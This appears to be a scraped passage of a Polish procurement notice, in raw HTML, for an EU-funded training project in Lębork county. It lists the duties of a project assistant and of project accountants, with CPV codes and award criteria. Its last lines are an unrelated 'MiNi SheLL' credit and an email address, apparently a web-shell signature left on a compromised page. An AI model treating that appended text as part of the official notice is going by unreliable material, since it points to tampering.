1)	Bieżąca realizacja zadań wynikających z projektu i współpraca z Koordynatorem projektu.
2)	Wykonywanie czynności administracyjnych związanych z realizacją projektu.
3)	Organizacja szkoleń/kursów/studiów wynikających z wniosku i harmonogramu projektu.
4)	Współpraca z wykładowcami w zakresie przygotowania szczegółowego programu szkoleń, w tym nadzór nad prawidłową realizacją szkoleń.
5)	Informowanie potencjalnych uczestników projektu o ofercie szkoleń/kursów finansowanych ze środków EFS i warunkach udziału w poszczególnych szkoleniach/kursach.
6)	Wykonywanie zadań składających się na proces rekrutacji grupy docelowej (formularz zgłoszenia, ankieta wstępna).
7)	Kontakt z prowadzącymi szkolenia/kursy.  
8)	Monitorowanie uczestnictwa Beneficjentów.
9)	Organizacja i koordynacja promocji projektu.
10)	Nadzór nad prowadzeniem strony internetowej dotyczącej projektu (dbałość o aktualne dane).
11)	Prowadzenie bieżącej dokumentacji projektu w oparciu o obowiązujące zapisy.
12)	Zapewnienie terminowej realizacji zadań wynikających z harmonogramu realizacji projektu.
13)	Dokonywanie systematycznej kontroli uzyskanych efektów.
14)	Prowadzenie bieżącej statystyki projektu (archiwum).
15)	Tworzenie bazy uczestników projektu.
16)	Przygotowanie i wydruk zaświadczeń o uczestnictwie w ramach projektu.
17)	Sporządzanie sprawozdań z realizacji projektu we współpracy z Koordynatorem projektu w zakresie realizacji szkoleń/kursów zaplanowanych w projekcie.
18)	Promocja projektu w mediach (prasa, radio) oraz poprzez plakaty, ulotki, broszurę informacyjną w szkołach i innych instytucjach współpracujących na terenie powiatu lęborskiego.
19)	Kontakt z partnerami w zakresie działań promocyjno - informacyjnych.
20)	Prowadzenie archiwum..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie i wykształcenie zawodowe - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie obsługi księgowej projektu - 2 osoby, do obowiązków których będzie należało: 
1)	Wspieranie działań Koordynatora projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektów.
2)	Sporządzenie sprawozdań okresowych.
3)	Prowadzenie dokumentacji księgowej projektu zgodnie z obowiązującymi przepisami finansowymi, w tym opisywanie faktur.
4)	Współpraca w zakresie księgowania i realizacji płatności projektu z Wydziałem Finansowo- Budżetowym Starostwa Powiatowego w Lęborku i Urzędu Miejskiego 
w Lęborku.
5)	Współpraca w zakresie księgowości z Instytucją Pośredniczącą i Zarządzającą.
6)	Współpraca w zakresie księgowości z partnerem projektu.
7)	Kontrola poprawności formalnej księgowych i finansowych dokumentów projektu.
8)	Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie 
z wytycznymi.
9)	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu).
10)	Dokonywanie kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu 
i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi.
11)	Comiesięczna kontrola zgodności bilansu finansowanego projektu, wykonana w oparciu 
o zapisy księgowe.         
12)	Przygotowanie we współpracy z Koordynatorem projektu harmonogramu płatności wg zasad określonych w dokumentach programowych.
13)	Prawidłowe oznaczenie i opisanie dokumentów księgowych przetwarzanych przy realizacji projektu.
14)	Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu. 
15)	Przygotowanie raportów o finansowym postępie w realizacji projektu. 
16)	Zapobieganie powstawaniu nieprawidłowości finansowych i raportowanie ich wystąpienia. 
17)	Rejestracja faktur i rachunków wpływających.
18)	Weryfikacja faktur pod względem formalno-rachunkowym i prawidłowości rozliczeń finansowych uwzględniających wszystkie źródła finansowania. 
19)	Nadzór nad płatnościami dla wykonawców. 
20)	Przestrzeganie procedur i instrukcji związanych z realizacją projektu.
21)	Ścisła współpraca z Głównym Księgowym Zamawiającego w zakresie księgowości projektu. 
22)	Rozliczenie finansowe z partnerem projektu.
23)	Współpraca z Koordynatorem Projektu i Asystentem Koordynatora w celu zapewnienia prawidłowego przepływu informacji.
24)	Współpraca z organami kontrolującymi.
25)	Przekazywanie dokumentacji rozliczeniowej do partnera projektu..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie i wykształcenie zawodowe - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com